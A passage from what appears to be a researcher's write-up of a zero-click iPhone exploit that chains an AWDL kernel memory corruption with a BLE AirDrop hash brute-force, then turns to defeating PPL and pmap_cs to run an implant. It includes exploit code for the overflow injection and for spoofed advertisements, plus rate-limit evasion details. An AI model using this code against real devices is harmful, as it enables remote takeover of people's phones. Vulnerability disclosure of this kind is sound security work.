           BSS_STEERING_0(reader_peers, n_peers),

           PKT_END());

 

    steering_begin_timestamp = now_nanoseconds();

    reader_peer = reader_peers[n_steered_peers++];

  }

 

  char overflower[128] = {0};

  *(uint64_t*)(&overflower[0x50]) = kaddr;

 

  // set the card's MAC to ACK the UMI from the target

  mt76_debugfs_change_mac(er_para.phy_str, reader_peer);

 

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)overflower,

                sizeof(overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // try to receive a UMI:

  void* steering_tlv = try_get_TLV(0x1d);

 

  if (steering_tlv) {

    struct mini_tlv {

      uint8_t type;

      uint16_t len;

    } __attribute__((packed));

    *out_size = ((struct mini_tlv*)steering_tlv)->len+3;

  } else {

    printf("didn't get TLV\n");

  }

 

  // NULL out the bsssteering blob

  char null_overflower [128] = {0};

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)null_overflower,

                sizeof(null_overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // the active monitor interface doesn't always manage to ACK

  // the first frame, give it a chance

  usleep(1*1000);

 

  return steering_tlv;

}

Demo

With some luck we can bootstrap the faster read primitive with 8 or fewer early reads which means on an iPhone 11 Pro with AWDL enabled popping calc now looks like this:


In this demo AWDL has been manually enabled by opening the sharing panel in the Photos app. This keeps the AWDL interface active. The exploit gains arbitrary kernel memory read and write within a few seconds and is able to inject a signal into a userspace process to cause it to JOP to a single gadget which opens Calculator.app

Zero clicks

I mentioned that AWDL has to be enabled, it isn't always on. In order to make this an interactionless zero-click exploit which can target any device in radio proximity we therefore need a way to force devices to enable their AWDL interface.


AWDL is used for many things. For example, my iPhone seems to turn on AWDL when it receives a voicemail because it really wants to Airplay the voicemail to my Apple TV. But sending someone a voicemail requires their phone number, and we're looking for an attack which requires no identifiers or non-default settings.


The second research paper from the SEEMOO labs team demonstrated an attack to enable AWDL using Bluetooth low energy advertisements to force arbitrary devices in radio proximity to enable their AWDL interfaces for Airdrop. SEEMOO didn't publish their code for this attack so I decided to recreate it myself.

Enabling AWDL

In the iOS photos app when you select the sharing dialog and click "Airdrop" a list of iOS and MacOS devices nearby appears, all of which you can send your photo to. Most people don't want random passers-by sending them unsolicited photos so the default AirDrop sharing setting is "Contacts Only" meaning you will only see AirDrop sharing requests from users in your contacts book. But how does this work? For an in-depth discussion, check out the SEEMOO labs paper.


When a device wants to share a file via AirDrop it starts broadcasting a bluetooth low-energy advertisements which looks like this example, broadcast by MacOS:


[PACKET] [ CH:37|CLK:1591031840.920892|RSSI:-44dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=28:C4:72:91:05:D7 | data=02010617ff4c000512000000000000000001297f247ee56f62b300 >>


BLE advertisements are small, they have a maximum payload size of 31 bytes. The bundle of bytes at the end are actually four truncated 2-byte SHA256 hashes of the contact information of the device which is trying to share something. The contact information used are the email addresses and phone numbers associated with the device's logged-in iCloud account. You can generate the same truncated hashes like this:


In this case I'm using a test account with the iCloud email address: '[email protected]'


>>> import hashlib

>>> s = '[email protected]'

>>> hashlib.sha256(s.encode('utf-8')).hexdigest()[:4] 

'62b3'


Notice that this matches the two penultimate bytes in the advertisement frame shown above. The contact hashes are unsalted which can have some fun consequences if you live in a country with localized mobile phone numbers, but this is an understandable performance optimization.


All iOS devices are constantly receiving and processing BLE advertisement frames like this. In the case of these AirDrop advertisements, when the device is in the default "Contacts Only" mode, sharingd (which parses BLE advertisements) checks whether this unsalted, truncated hash matches the truncated hashes of any emails or phone numbers in the device's address book.


If a match is found this doesn't actually mean the sending device really is in the receiver's address book, just that there is a contact with a colliding hash. In order to resolve this the devices need to share more information and at this point the receiver enables AWDL to establish a higher-bandwidth communication channel.


The SEEMOO labs paper continues in great detail about how the two devices then really verify that the sender is in the receiver's address book, but we are only trying to get AWDL enabled so we're done. As long as we keep broadcasting the advertisement with the colliding hash the target's AWDL interface will remain active.

Blue in the teeth

The SEEMOO labs team paper discusses the custom firmware they wrote for a BBC micro:bit so I picked up a couple of those:


The BBC micro:bit is an education-focused dev board. This photo shows the rear of the board; the front has a 5x5 LED matrix and two buttons. They cost under $20.


These devices are intended for the education/maker market. It's a Nordic nRF51822 SOC with a Freescale KL26 acting as a USB programmer for the nRF51. BBC provide a small programming environment for it, but you can build any firmware image for the nRF51, plug in the micro:bit which appears as a mass-storage device thanks to the KL26 and drag and drop the firmware image on there. The programmer chip flashes the nRF51 for you and you can run your code. This is the device which the SEEMOO labs team used and wrote a custom firmware for.


Whilst playing around with the micro:bit I discovered the MIRAGE project, a generic and amazingly well documented project for doing all manner of radio security research. Their tools have a firmware for the micro:bit, and indeed, dropping their provided firmware image on to the micro:bit and running this:


sudo ./mirage_launcher ble_sniff SNIFFING_MODE=advertisements INTERFACE=microbit0


we're able to start sniffing BLE advertisements:


[PACKET] [ CH:37|CLK:1591006615.511192|RSSI:-46dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=58:6A:80:4F:41:74 | data=02011a020a0707ff4c000f020000 >>


Indeed, if you do this at home you'll likely see a barrage of BLE traffic from everything imaginable. Apple devices are particularly chatty, notice the frames sent each time your Airpods case is open and closed.


If we take a look at a couple of captured BTLE frames when we try to share a file via AirDrop, we can see there's clearly structure in there:


MacOS:

data=02010617ff4c000512000000000000000001fa5c2516bf07aba400

iOS 13:

data=02011a020a070eff4c000f05a035c928291002710c

 

             LEN    APPL T L  V

020106       17  ff 4c00 0512 000000000000000001 fa5c 2516 bf07 aba4 00

02011a020a07 0e  ff 4c00 0f05 a035c92829 1002 710c

                                

Definitely looks like more TLVs! With some reversing in sharingd we can figure out what these types are:


"Invalid" 0x0

"Hash" 0x1

"Company" 0x2

"AirPrint" 0x3

"ATVSetup" 0x4

"AirDrop" 0x5

"HomeKit" 0x6

"Prox" 0x7

"HeySiri" 0x8

"AirPlayTarget" 0x9

"AirPlaySource" 0xa

"MagicSwitch" 0xb

"Continuity" 0xc

"TetheringTarget" 0xd

"TetheringSource" 0xe

"NearbyAction" 0xf

"NearbyInfo" 0x10

"WatchSetup" 0x11


MacOS is sending AirDrop messages in the BLE advertisements. iOS is sending NearbyAction and NearbyInfo messages.

Brute forcing SHA256, or two bytes of it at least

For testing purposes we want some contacts on the device. Like the SEEMOO labs paper I generated 100 random contacts using a modified version of the AppleScript in this StackOverflow answer. Each contact has 4 contact identifiers: home and work email, home and work phone numbers.


We can also use MIRAGE to prototype brute forcing through the 16 bit space of truncated contact hashes. I wrote a MIRAGE module to broadcast Airdrop advertisements with incrementing truncated hashes. The MIRAGE micro:bit firmware doesn't support arbitrary broadcast frame injection but it is able to use the Raspberry Pi 4's built-in bluetooth controller. Running it for a while and looking at the console output from the iPhone we notice some helpful log messages showing up in Console.app:


Hashing: Error: failed to get contactsContainsShortHashes because (ratelimited)


The SEEMOO paper mentioned that they were able to brute force a truncated hash in a couple of seconds but it appears Apple have now added some rate limiting.


Spoofing different BT source MAC addresses didn't help but slowing the brute force attempts to one every 2 seconds or so seemed to please the rate limiting and in around 30 seconds, with average luck AWDL gets enabled and MI and PSF frames start to appear on the AWDL social channels.


As long as we keep broadcasting the same advertisement with the matching contact hash the AWDL interface will remain active. I didn't want to keep MIRAGE as a dependency so I ported the python prototype to use the linux native libbluetooth library and hci_send_cmd to build custom advertisement frames:


uint8_t payload[] = {0x02, 0x01, 0x06,

                     0x17,

                     0xff,

                     0x4c, 0x00, 

                     0x05, 

                     0x12, 

                     0x00, 0x00, 0x00, 0x00,

                     0x00, 0x00, 0x00, 0x00, 0x01, 

 

                     hash1[0], hash1[1],

                     hash2[0], hash2[1],

                     hash3[0], hash3[1],

                     hash4[0], hash4[1],

 

                     0x00};

 

le_set_advertising_data_cp data = {0};

data.length = sizeof(payload);

memcpy(data.data, payload, sizeof(payload));

hci_send_cmd(handle,

             OGF_LE_CTL,

             OCF_LE_SET_ADVERTISING_DATA,

             sizeof(payload)+1,

             &data);

Popping calc with zero clicks

Combining the AWDL exploit and BLE brute-force, we get a new demo:


With the phone left idle on the home screen and no user interaction we force the AWDL interface to activate using BLE advertisements. The AWDL exploit gains kernel memory read write in a few seconds after starting and the entire end to end exploit takes around a minute.


There may well be better, faster ways to force-enable AWDL but for my demo this will do.

Let's run an implant!

This demo is neat but really doesn't convey that we've compromised almost all the user's data, with no interaction. We can read and write kernel memory remotely. I know that Apple has invested significant effort in "post-exploitation" hardening so I wanted to demonstrate that with just this single vulnerability these could be defeated to the point where I could run something like a real-world implant which we've seen being deployed in real world exploitation against end users before. Trying to defend against an attacker with arbitrary memory read/write is a losing game, but there's a difference between saying that and you believing me, and proving it.

Speedy writer

We're going to need to write much more arbitrary data for this final step, so we need the arbitrary write to be even faster. There's one more optimization left.


Due to the order in which loads and stores occur in actionFrameReport we were able to build a primitive which gave us a timestamp valid for up to 1024ms and a large n_frames_in_last_second value. We used that to do one arbitrary add, then restarted the whole setup: replaced upper_peer's timestamp with 0, sent another frame to get a fresh timestamp and so on.


But why can't we just keep using the first timestamp and bundle more writes together? We can, it's just very important to take care that we don't exceed that 1024ms window. The exploit takes a very conservative approach here and uses only a few extra milliseconds. The reason is that we're running as a regular userspace program on a small system. We don't have anything like real-time scheduling guarantees. Linux kind-of supports running userspace programs on isolated cores to give something like a real-time experience, but for getting this demo exploit running it was sufficient to boost the priority of the exploit process with nice and leave a large safety window in the 1024ms. The code tries to bundle large buffer writes in chunks of 16 which provides a reasonable speed up.

Physmapping

Way back when I released the first demo exploit which disclosed random chunks of physical memory I had taken a look at how the physmap works on iOS.


Linux, Windows and XNU all have physmaps; they are a very convenient way of manipulating physical memory when your code has paging enabled and can't directly manipulate physical memory any more.


Abstractly, physmaps are virtual mappings of all of physical memory


The physmap is (typically) a 1:1 virtual mapping of physical memory. You can see in the diagram how the physical memory at the bottom might be split up into different regions, with some of those regions currently mapped in the kernel virtual address space. Some other physical memory regions might for example be used for userspace processes.


The physmap is the large kernel virtual memory region shown towards the right of the virtual address space, which is the same size as the amount of physical memory. The pagetables which translate virtual memory accesses in this region are set up in such a way that any access at an offset into the physmap virtual region gets translated to that same offset from the base of physical memory.


The physmap in XNU isn't set up exactly like that. Instead they use a "segmented physical aperture". In practise this means that they set up a number of smaller "sub-physmaps" inside the physmap region and populate a table called the PTOV table to allow translation from a physical address to a virtual address inside the physmap region:


pa: 0x000000080e978000 kva: 0xfffffff070928000 len: 0xde03c000 (3.7GB)

pa: 0x0000000808e14000 kva: 0xfffffff06ade4000 len: 0x05b44000 (95MB)

pa: 0x0000000801b80000 kva: 0xfffffff066000000 len: 0x04cb8000 (80MB)

pa: 0x0000000808d04000 kva: 0xfffffff06acf4000 len: 0x000f0000 (1MB)

pa: 0x0000000808df4000 kva: 0xfffffff06acd4000 len: 0x00020000 (130kb)

pa: 0x0000000808cec000 kva: 0xfffffff06acbc000 len: 0x00018000 (100kb)

pa: 0x0000000808a80000 kva: 0xfffffff06acb8000 len: 0x00004000 (16kb)

pa: 0x0000000808df4000 kva: 0xfffffff06acf4000 len: 0x00000000 (0kb)


There's one more important physical region not captured in the PTOV table which is the kernelcache image itself; this is found starting at gVirtBase and the kernel functions for translating between physical and physmap-virtual addresses take this into account.


The interesting thing is that the virtual protection of the pages in the physmap doesn't have to match the virtual protection of the pages as seen by a page table traversal from the perspective of a task. I wrote some test code using oob_timestamp to overwrite a portion of its own __TEXT segment in the physmap and it worked, allowing me to execute new native instructions. Could we execute userspace shellcode remotely by writing just directly into the physmap?

What happened to my physmap?

This works fine when prototyped using oob_timestamp modifying itself; but if you try to use it to target a system process, it panics. Something else is going on.

APRR, PPL and pmap_cs.

The canonical resource for APRR is s1guza's blog post. It's a hardware customization by Apple to add an extra layer of indirection to page protection lookups via a control register. The page-tables alone are no longer enough to determine the runtime memory protection of a page.


APRR is used in the Safari JIT hardening and in the kernel it's used to implement PPL (Page Protection Layer). For an in-depth look at PPL check out Brandon Azad's recent blog post.


PPL uses APRR to dynamically switch the page protections of two kernel regions, a text region containing code and a data region. Normally the PPL text region is not executable and the PPL data region is not writable. Important data structures have been moved into this PPL data region, including page tables and pmaps (the abstraction layer above page tables). All the code which modifies objects inside PPL data has been moved inside the PPL text segment.


But if the PPL text is non-executable, how can you run the code to modify the PPL data regions? And how can you make them writable?


The only way to execute the code inside the PPL text region is to go through a trampoline function which flips the APRR register bits to make the PPL text region executable and the PPL data region writable before jumping to the provided ppl_routine. Obviously great care has to be taken to ensure only code inside PPL text runs in this state.


Brandon likened this to a "kernel inside the kernel" which is a good way to look at it. Modifications to page tables and pmaps are now meant to only happen by the kernel making "PPL syscalls" to request the modifications, with the implementation of those PPL syscalls being inside the PPL text region. Check out Brandon's blog post for discussion of how to exploit a vulnerability in the PPL code to make those changes anyway!


It turns out that it's not just page tables and pmaps which PPL protects. Reversing more of the PPL routines there's a section of them starting around routine 38 which are implementing a new model of codesigning enforcement called pmap_cs.


Indeed, this pmap_cs string appears in the released XNU source, though attempts have been made to strip as much of the PPL related code as possible from the open source release. The vm_map_entry structure has this new field:


  /* boolean_t */ pmap_cs_associated:1, /* pmap_cs will validate */


From this code snippet from vm_fault.c it's pretty clear that pmap_cs is a new way to verify code signatures:


#if PMAP_CS

  if (fault_info->pmap_cs_associated &&

       pmap_cs_enforced(pmap) &&

       !m->vmp_cs_validated &&

       !m->vmp_cs_tainted &&

       !m->vmp_cs_nx &&

       (prot & VM_PROT_EXECUTE) &&

       (caller_prot & VM_PROT_EXECUTE)) {

         /*

          * With pmap_cs, the pmap layer will validate the

          * code signature for any executable pmap mapping.

          * No need for us to validate this page too:

          * in pmap_cs we trust...

          */

          vm_cs_defer_to_pmap_cs++;

  } else {

    vm_cs_defer_to_pmap_cs_not++;

    vm_page_validate_cs(m);

  }

#else /* PMAP_CS */

  vm_page_validate_cs(m);

#endif /* PMAP_CS */


vm_page_validate_cs is the old code-signing enforcement code, which can be easily tricked into allowing shellcode by changing the codesigning enforcement flags in the task's proc structure. The question is what determines whether the new pmap_cs model or the old approach is used?